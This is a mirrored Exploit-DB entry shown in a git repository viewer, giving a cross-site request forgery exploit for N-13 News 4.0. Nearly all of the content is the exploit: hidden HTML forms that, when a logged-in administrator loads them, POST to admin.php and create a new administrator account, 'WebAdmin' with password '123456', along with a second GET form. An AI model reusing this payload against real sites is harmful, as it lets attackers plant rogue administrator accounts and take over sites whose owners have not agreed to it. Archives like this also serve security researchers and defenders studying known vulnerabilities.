bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/16931.html
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

27 lines
No EOL
1.2 KiB
HTML
Raw Blame History

N-13 News 4.0 CSRF Vulnerability (Add Admin)
====================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://n-13news.googlecode.com/files/n13news4.0.1.zip
.:. Tested On Demo : http://network-13.com/news/
.:. Home : http://www.sec-risk.com/vb/
####################################################################
===[ Exploit ]===
<form method="POST" name="form0" action="http://localhost/N-13 News 4.0/admin.php?action=options&mod=accounts&create=new">
<input type="hidden" name="accountname" value="WebAdmin"/>
<input type="hidden" name="accountemail" value="Example@hotmail.com"/>
<input type="hidden" name="accountpassword1" value="123456"/>
<input type="hidden" name="accountpassword2" value="123456"/>
<input type="hidden" name="accountaccesslevel" value="1"/>
<input type="hidden" name="S1" value="Save"/>
</form>
<form method="GET" name="form1" action="http://localhost/N-13 News 4.0/js/main.php">
<input type="hidden" name="name" value="value"/>
</form>
</body>
</html>
####################################################################
Reference in a new issue View git blame Copy permalink